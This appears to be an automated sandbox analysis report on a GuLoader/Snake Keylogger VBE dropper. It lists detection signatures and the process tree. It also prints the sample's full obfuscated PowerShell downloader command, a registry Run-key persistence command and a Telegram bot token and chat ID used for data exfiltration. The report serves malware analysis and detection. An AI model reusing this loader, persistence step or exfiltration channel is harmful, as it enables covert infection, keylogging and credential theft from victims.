Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4500149631.vbe

Overview

General Information

Sample name:4500149631.vbe
Analysis ID:1636427
MD5:6119da96a2b2a06d8eabea4cb705bd6a
SHA1:a26c9f58d83b2c30e596c63f25899766e8b43edd
SHA256:bf2cb64d341406561b3e57567b001abda93779729e3ab51b7ef4a612ca09981c
Tags:GuLoadervbeuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7100 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 7148 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BailDStrmoimpawBetjnHerrlAnamo DowaTun d SvaFBe.uiJubilTopkeA is( Sko$TumiETrkgfGe ltStoce angrM nia Sk bNo me prelf.aasdesqeFlinr ounVelgeAn i1Konk7F tu4,ane,Jagt$ CoeA verssmilp rkua olcPor,eSmre)';$Aspace=$Annuloid;Testvrktjer (Uprouse15 'Delm$.arigbioglrgfaoindsbVerdAUptolfris:ListISprinOb,ltreineIncogChapRForsiXyl o.seluBegySUnau=Skre( StaTovere arksAtteT Sne-IciepVergaTeleTRu mH Scl Cadi$BunkAFagls GonPSnigA.algCTeareTran)');while (!$Integrious) {Testvrktjer (Uprouse15 'R in$BortgkartlordboShitbFro,aInfrlSnor:SnadGTin,uSkaldPro eOnentU barKultoShut1Ster4Mame6Ort =Vacu$Lio.PGummh redosektr No,oZeekn SnooYdermBomhiBal,c hows') ;Testvrktjer $Saaede;Testvrktjer (Uprouse15 'H lb[ CenTKorrhPolyR CabeBe.oaHal,dEquiIAtolnSpurgKse ..rest SkyHHyporMonoEBureaNo aDArte]Incl:Se u:StraSho,il VekeIndbEIndipArch( War4Meni0 sek0Lope0 Idi)');Testvrktjer (Uprouse15 'Hulh$ N ng,tatlRealOSi.dBSaggADisslTrre:DykkiCoroNDiplt AsteAglyGFrolRSandIKameOCounu SpiSPale= Amp(KariT j sEMul sUnneTGoka-Landp FlsaUnd T BrahP ra Haan$SeceASk.lS Ba pStata,kylCBe,geA.to)') ;Testvrktjer (Uprouse15 'Kurs$AbsogSweeLRaasOMartB.esiAmo kLOpta:CursRD,ssoHa dtRootTVagaEFalsGrespiKlveffelttOverE TonnOve.ETord=duom$BogeGLandLpulvoAeroB idsaLa nLfron:Re,dSNiloYRaasNLignG IndEFejlPVaevIAn egS ureoverrSc n+ ede+ Ber%Undi$Tavss uglpklogI An,SSemiEPeripA phLRe.nI KlogTaktt Pre1 Ef 5Wa e.VeloCChrooBrocUD.bbnUnvaT') ;$Efterabelserne174=$Spisepligt15[$Rottegiftene]}$Desperance=320598;$Possessionate=30572;Testvrktjer (Uprouse15 ' Pim$Be kGSkrilasc,oDiktBFe ta AntLPoli: cutGadgaRFormIDe ebLikeBPoliEirreN De Lact=Daar ConsGHejsETestTBort- Ko CRageoConcntillTFenmeUb,gnTrumTGazu Kath$ LobaQv xs ryppFlgeaM,rbCOvere');Testvrktjer (Uprouse15 'Nitr$Destg jrkl ForoUnweb,lolaUngdlYem : SkiIKinds V,noTr.ll Fora imut usiOffhoStrenOrarsperimOmlaaDec tC roe oidrKoumiFai a Mi,lStudegescsDapa Rep=Brem Sa i[LektSKlimyS.uesSyv tPro erelemK,ma.ManiCStano R bnStrevC.joe AmerHovetFinl] Aut:vaud:,edeFExcirThi oAlphmSa,eBwaleaUafvs TrueHydr6 k d4BortS S,mtBeharluf,iAn inU,cogAbbe( ges$,ontG nder KiniUdmab hoob A,se An.n Noe)');Testvrktjer (Uprouse15 'Fril$FumlG TablHju oF,isbDi eaba,bLputa:Und.kParaUVranRRobosVidtgMagieDa,evBandIFau nGhe sSkaatKlu, rak=Ki.s I.ht[AficS.oolyS,olsLiecTBegreCellmOuts.Hgtnt RegEWallx R atRess.SetiE P.pNPregcBa,lo eruD tuIGstensvinG Sur]che : atl:ParaA TytsS,naC VrvI Kk IB.li.O cngBlobeRektTNarrS FortUnefrGladi ja,nTraeGF lk(.eal$Co sI Ud s EcoO SpiLStataS.osTSprjI .deoVinrnOverS Ub.mToppa NastRensEKoprRKeveiRejoa S,oLInd,eBortsKorr)');Testvrktjer (Uprouse15 ' is$ConfgOpvaLPro o elB kofAFl.plPseu:AsseH.egeA acv Ko EOpsaMCursnKar dPent=Tros$Intek C,iuq erR IciSSquagTopsEForfvsherI aafnS irs,ntat P.r.coloSOv,ruHeptBpaceSTristAr.eRTil,I RelN Ta gLe t(T it$UneqDTortEU deStalePPuppe UngRL reaMoltNVolaC aueKopp,Ri e$ Pi,pUntioAfgaS ForSOmdeE ,heS cals.bsoI St.O utinImmoa.errT issEDr,l)');Testvrktjer $Havemnd;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2032 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BailDStrmoimpawBetjnHerrlAnamo DowaTun d SvaFBe.uiJubilTopkeA is( Sko$TumiETrkgfGe ltStoce angrM nia Sk bNo me prelf.aasdesqeFlinr ounVelgeAn i1Konk7F tu4,ane,Jagt$ CoeA verssmilp rkua olcPor,eSmre)';$Aspace=$Annuloid;Testvrktjer (Uprouse15 'Delm$.arigbioglrgfaoindsbVerdAUptolfris:ListISprinOb,ltreineIncogChapRForsiXyl o.seluBegySUnau=Skre( StaTovere arksAtteT Sne-IciepVergaTeleTRu mH Scl Cadi$BunkAFagls GonPSnigA.algCTeareTran)');while (!$Integrious) {Testvrktjer (Uprouse15 'R in$BortgkartlordboShitbFro,aInfrlSnor:SnadGTin,uSkaldPro eOnentU barKultoShut1Ster4Mame6Ort =Vacu$Lio.PGummh redosektr No,oZeekn SnooYdermBomhiBal,c hows') ;Testvrktjer $Saaede;Testvrktjer (Uprouse15 'H lb[ CenTKorrhPolyR CabeBe.oaHal,dEquiIAtolnSpurgKse ..rest SkyHHyporMonoEBureaNo aDArte]Incl:Se u:StraSho,il VekeIndbEIndipArch( War4Meni0 sek0Lope0 Idi)');Testvrktjer (Uprouse15 'Hulh$ N ng,tatlRealOSi.dBSaggADisslTrre:DykkiCoroNDiplt AsteAglyGFrolRSandIKameOCounu SpiSPale= Amp(KariT j sEMul sUnneTGoka-Landp FlsaUnd T BrahP ra Haan$SeceASk.lS Ba pStata,kylCBe,geA.to)') ;Testvrktjer (Uprouse15 'Kurs$AbsogSweeLRaasOMartB.esiAmo kLOpta:CursRD,ssoHa dtRootTVagaEFalsGrespiKlveffelttOverE TonnOve.ETord=duom$BogeGLandLpulvoAeroB idsaLa nLfron:Re,dSNiloYRaasNLignG IndEFejlPVaevIAn egS ureoverrSc n+ ede+ Ber%Undi$Tavss uglpklogI An,SSemiEPeripA phLRe.nI KlogTaktt Pre1 Ef 5Wa e.VeloCChrooBrocUD.bbnUnvaT') ;$Efterabelserne174=$Spisepligt15[$Rottegiftene]}$Desperance=320598;$Possessionate=30572;Testvrktjer (Uprouse15 ' Pim$Be kGSkrilasc,oDiktBFe ta AntLPoli: cutGadgaRFormIDe ebLikeBPoliEirreN De Lact=Daar ConsGHejsETestTBort- Ko CRageoConcntillTFenmeUb,gnTrumTGazu Kath$ LobaQv xs ryppFlgeaM,rbCOvere');Testvrktjer (Uprouse15 'Nitr$Destg jrkl ForoUnweb,lolaUngdlYem : SkiIKinds V,noTr.ll Fora imut usiOffhoStrenOrarsperimOmlaaDec tC roe oidrKoumiFai a Mi,lStudegescsDapa Rep=Brem Sa i[LektSKlimyS.uesSyv tPro erelemK,ma.ManiCStano R bnStrevC.joe AmerHovetFinl] Aut:vaud:,edeFExcirThi oAlphmSa,eBwaleaUafvs TrueHydr6 k d4BortS S,mtBeharluf,iAn inU,cogAbbe( ges$,ontG nder KiniUdmab hoob A,se An.n Noe)');Testvrktjer (Uprouse15 'Fril$FumlG TablHju oF,isbDi eaba,bLputa:Und.kParaUVranRRobosVidtgMagieDa,evBandIFau nGhe sSkaatKlu, rak=Ki.s I.ht[AficS.oolyS,olsLiecTBegreCellmOuts.Hgtnt RegEWallx R atRess.SetiE P.pNPregcBa,lo eruD tuIGstensvinG Sur]che : atl:ParaA TytsS,naC VrvI Kk IB.li.O cngBlobeRektTNarrS FortUnefrGladi ja,nTraeGF lk(.eal$Co sI Ud s EcoO SpiLStataS.osTSprjI .deoVinrnOverS Ub.mToppa NastRensEKoprRKeveiRejoa S,oLInd,eBortsKorr)');Testvrktjer (Uprouse15 ' is$ConfgOpvaLPro o elB kofAFl.plPseu:AsseH.egeA acv Ko EOpsaMCursnKar dPent=Tros$Intek C,iuq erR IciSSquagTopsEForfvsherI aafnS irs,ntat P.r.coloSOv,ruHeptBpaceSTristAr.eRTil,I RelN Ta gLe t(T it$UneqDTortEU deStalePPuppe UngRL reaMoltNVolaC aueKopp,Ri e$ Pi,pUntioAfgaS ForSOmdeE ,heS cals.bsoI St.O utinImmoa.errT issEDr,l)');Testvrktjer $Havemnd;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 1644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5216 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 5296 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5968 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • svchost.exe (PID: 7016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8", "Chat_id": "1503224244", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000006.00000002.1618891964.00000000081F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000006.00000002.1602163136.000000000545A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 9 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6564.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_2032.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc2f1:$b2: ::FromBase64String(
              • 0xb384:$s1: -join
              • 0x4b30:$s4: +=
              • 0x4bf2:$s4: +=
              • 0x8e19:$s4: +=
              • 0xaf36:$s4: +=
              • 0xb220:$s4: +=
              • 0xb366:$s4: +=
              • 0x15488:$s4: +=
              • 0x15508:$s4: +=
              • 0x155ce:$s4: +=
              • 0x1564e:$s4: +=
              • 0x15824:$s4: +=
              • 0x158a8:$s4: +=
              • 0xbb94:$e4: Get-WmiObject
              • 0xbd83:$e4: Get-Process
              • 0xbddb:$e4: Start-Process
              • 0x160e8:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", ProcessId: 7100, ProcessName: wscript.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Litteraturlistes
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5296, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", ProcessId: 5968, ProcessName: reg.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.159.153.17, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5216, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49694
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5216, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", ProcessId: 5296, ProcessName: cmd.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", ProcessId: 7100, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
